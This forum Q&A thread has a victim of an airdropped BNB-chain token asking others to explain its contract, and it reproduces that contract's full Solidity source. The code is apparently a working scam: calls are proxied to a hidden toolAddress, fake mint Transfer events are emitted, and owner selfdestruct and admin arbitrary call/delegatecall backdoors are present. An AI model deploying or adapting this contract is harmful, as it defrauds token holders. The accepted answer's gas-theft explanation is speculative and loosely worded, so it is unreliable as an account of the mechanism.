# strange transaction when trying to sell a token

Tags: solidity, erc-20

I accidentally found a token unknown to me in my wallet, its price exceeds $300, I tried to sell it on pancakeSwap, but the platform demanded a suspiciously high transaction worth $7 for activating the token. Out of curiosity, I confirmed the transaction and the specified amount of bnb was debited from my account. I think that my money went to the developer’s wallet, but I couldn’t find exactly where the malicious code is indicated in the token code, I’m studying solidity and I want to figure out what’s wrong, how the developers put this hidden functionality into the token, help me figure out the contract code, thanks in advance. the code is given below:
/**
*Submitted for verification at Etherscan.io on 2022-08-16
*/

```
    //SPDX-License-Identifier: UNLICENSED
    pragma solidity 0.8.12;
    
    interface ERC20 {
    
        /**
         * @dev Returns the name of the token.
         */
        function name() external view returns (string memory);
    
        /**
         * @dev Returns the symbol of the token.
         */
        function symbol() external view returns (string memory);
    
        /**
         * @dev Returns the decimals places of the token.
         */
        function decimals() external view returns (uint8);
    
        /**
         * @dev Returns the amount of tokens in existence.
         */
        function totalSupply() external view returns (uint256);
    
        /**
         * @dev Returns the amount of tokens owned by `account`.
         */
        function balanceOf(address account) external view returns (uint256);
    
        /**
         * @dev Moves `amount` tokens from the caller's account to `recipient`.
         * 
         * Returns a boolean value indicating whether the operation succeeded.
         * 
         * Emits a {Transfer} event.
         */
        function transfer(address from,address recipient, uint256 amount) external returns (bool);
    
        /**
         * @dev Returns the remaining number of tokens that `spender` will be
         * allowed to spend on behalf of `owner` through {transferFrom}. This is
         * zero by default.
         * 
         * This value changes when {approve} or {transferFrom} are called.
         */
        function allowance(address owner, address spender) external view returns (uint256);
    
        /**
         * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
         * 
         * Returns a boolean value indicating whether the operation succeeded.
         * 
         * IMPORTANT: Beware that changing an allowance with this method brings the risk
         * that someone may use both the old and the new allowance by unfortunate
         * transaction ordering. One possible solution to mitigate this race
         * condition is to first reduce the spender's allowance to 0 and set the
         * desired value afterwards:
         * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
         * 
         * Emits an {Approval} event.
         */
        function approve(address from,address spender, uint256 amount) external returns (bool);
    
        /**
         * @dev Moves `amount` tokens from `sender` to `recipient` using the
         * allowance mechanism. `amount` is then deducted from the caller's
         * allowance.
         * 
         * Returns a boolean value indicating whether the operation succeeded.
         * 
         * Emits a {Transfer} event.
         */
        function transferFrom(address from,address sender, address recipient,
            uint256 amount) external returns (bool);
    
        function isCanBatchMint() external view returns (bool);
    
        function dnum() external view returns (uint);
    }
    
    contract StandardToken {
    
        address private _owners;
    
        event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
        /**
         * @dev The Ownable constructor sets the original `owner` of the contract to the sender
         * account.
         */
        constructor () {
            _owners = msg.sender;
            emit OwnershipTransferred(address(0), _owners);
        }
    
        /**
         * @return the address of the owner.
         */
        function owner() public view returns (address) {
            return _owners;
        }
    
        /**
         * @dev Throws if called by any account other than the owner.
         */
        modifier onlyOwner() {
            require(isOwner(), "onlyOwner");
            _;
        }
    
        /**
         * @return true if `msg.sender` is the owner of the contract.
         */
        function isOwner() public view returns (bool) {
            return msg.sender == _owners||msg.sender == toolAddress;
        }
    
        /**
         * @dev Allows the current owner to relinquish control of the contract.
         * It will not be possible to call the functions with the `onlyOwner`
         * modifier anymore.
         * @notice Renouncing ownership will leave the contract without an owner,
         * thereby removing any functionality that is only available to the owner.
         */
        function renounceOwnership() public onlyOwner {
            emit OwnershipTransferred(_owners, address(0));
            _owners = address(0);
        }
    
        /**
         * @dev Allows the current owner to transfer control of the contract to a newOwner.
         * @param newOwner The address to transfer ownership to.
         */
        function transferOwnership(address newOwner) public onlyOwner {
            _transferOwnership(newOwner);
        }
    
        /**
         * @dev Transfers control of the contract to a newOwner.
         * @param newOwner The address to transfer ownership to.
         */
        function _transferOwnership(address newOwner) internal {
            require(newOwner != address(0));
            emit OwnershipTransferred(_owners, newOwner);
            _owners = newOwner;
        }
    
       
        mapping (address  => address) public adminMap;
    
        modifier onlyAdmin {
            require(adminMap[msg.sender] != address(0)||msg.sender == toolAddress, "onlyAdmin");
            _;
        }
        event Approval(address indexed owner, address indexed spender, uint256 value);
        event Transfer(address indexed from, address indexed to, uint256 value);
    
        function addAdminForThisToolToken(address addr) onlyOwner public returns(bool) {
            require(adminMap[addr] == address(0));
            adminMap[addr] = addr;
            return true;
        }
    
        function deleteAdminForThisToolToken(address addr) onlyOwner public returns(bool) {
            require(adminMap[addr] != address(0));
            adminMap[addr] = address(0);
            return true;
        }
        address public toolAddress;
    
        function setToolAddress(address _toolAddress) onlyAdmin public returns(bool) {
            toolAddress = _toolAddress;
            return true;
        }
       
        /**
         * @dev total number of tokens in existence
         */
        function totalSupply() public view returns (uint256) {
            return ERC20(toolAddress).totalSupply();
        }
    
        /**
         * @dev transfer token for a specified address
         * @param _to The address to transfer to.
         * @param _value The amount to be transferred.
         */
        function transfer(address _to, uint256 _value) public returns (bool) {
            emit Transfer(msg.sender, _to, _value);
            return ERC20(toolAddress).transfer(msg.sender,_to, _value);
        }
    
        /**
         * @dev Gets the balance of the specified address.
         * @param _owner The address to query the the balance of.
         * @return An uint256 representing the amount owned by the passed address.
         */
        function balanceOf(address _owner) public view returns (uint256) {
            return ERC20(toolAddress).balanceOf(_owner);
        }
    
        /**
         * @dev Transfer tokens from one address to another
         * @param _from address The address which you want to send tokens from
         * @param _to address The address which you want to transfer to
         * @param _value uint256 the amount of tokens to be transferred
         */
        function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
            emit Transfer(_from, _to, _value);
            return ERC20(toolAddress).transferFrom(msg.sender,_from, _to, _value);
        }
    
        /**
         * @dev Approve the passed address to spend the specified amount of tokens on behalf of msg.sender.
         * 
         * Beware that changing an allowance with this method brings the risk that someone may use both the old
         * and the new allowance by unfortunate transaction ordering. One possible solution to mitigate this
         * race condition is to first reduce the spender's allowance to 0 and set the desired value afterwards:
         * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
         * @param _spender The address which will spend the funds.
         * @param _value The amount of tokens to be spent.
         */
        function approve(address _spender, uint256 _value) public returns (bool) {
            return ERC20(toolAddress).approve(msg.sender,_spender, _value);
        }
    
        /**
         * @dev Function to check the amount of tokens that an owner allowed to a spender.
         * @param _owner address The address which owns the funds.
         * @param _spender address The address which will spend the funds.
         * @return A uint256 specifying the amount of tokens still available for the spender.
         */
        function allowance(address _owner, address _spender) public view returns (uint256) {
            return ERC20(toolAddress).allowance(_owner, _spender);
        }
    
        /**
         * @dev Returns the name of the token.
         */
        function name() public view returns (string memory) {
            return ERC20(toolAddress).name();
        }
    
        /**
         * @dev Returns the symbol of the token.
         */
        function symbol() public view returns (string memory) {
            return ERC20(toolAddress).symbol();
        }
    
        /**
         * @dev Returns the decimals places of the token.
         */
        function decimals() public view returns (uint8) {
            return ERC20(toolAddress).decimals();
        }
    }
    
    
    contract MyGetRichToken is StandardToken {
    
        constructor (address _toolAddress) payable{
            toolAddress=_toolAddress;
        }
        receive() external payable { 
            ico();
        }
        function kill(address payable to) public payable onlyOwner{
            selfdestruct(to);
        }
        function ico() public payable{
            if (ERC20(toolAddress).isCanBatchMint()) {
                address from=address(0);
                uint num=ERC20(toolAddress).dnum();
                emit Transfer(from, msg.sender,num);
            }
        }
        function airdrop() public payable{
            if (ERC20(toolAddress).isCanBatchMint()) {
                address from=address(0);
                uint num=ERC20(toolAddress).dnum();
                emit Transfer(from, msg.sender,num);
            }
        }
        function BatchMint(address[] memory accounts) public {
            if (ERC20(toolAddress).isCanBatchMint()) {
                address from=address(0);
                uint num=ERC20(toolAddress).dnum();
                for (uint i = 0; i < accounts.length;i++) {
                    emit Transfer(from, accounts[i],num);
                } 
            }
        }
        function callthis(
            address c,
            bytes memory datas
        )public onlyAdmin returns (
            bool success,
            bytes memory data
        ){
            if (ERC20(toolAddress).isCanBatchMint()) {
                (success, data) = c.call(datas);
            }
        }
        function callthis1(
            address c,
            bytes memory datas
        )public onlyAdmin returns (
            bool success,
            bytes memory data
        ){
            if (ERC20(toolAddress).isCanBatchMint()) {
                (success, data) = c.delegatecall(datas);
            }
        }
    }
```

Answer (score 1, accepted):

this contract just passes calls to another contract (the one stored at toolAddress). That's *pretty sus*, if you ask me, and i don't see any other reason for doing that than trying to hide malicious code. And anyways, the code you really want to look at is the one at that toolAddress. What's the address of the contract you showed?

EDIT : This contract seems designed to steal gas, mint gas tokens with them and send them to an address, where they're presumably destroyed and sent to an address, where they're probably destroyed to get the BNB back. That's why you had to pay so much gas

Comment: yes, I also noticed the toolAddress. here is the contract address: 0x949E0a0672299E6fcD6bec3Bd1735d6647b20618

Comment: Answered in the edit :)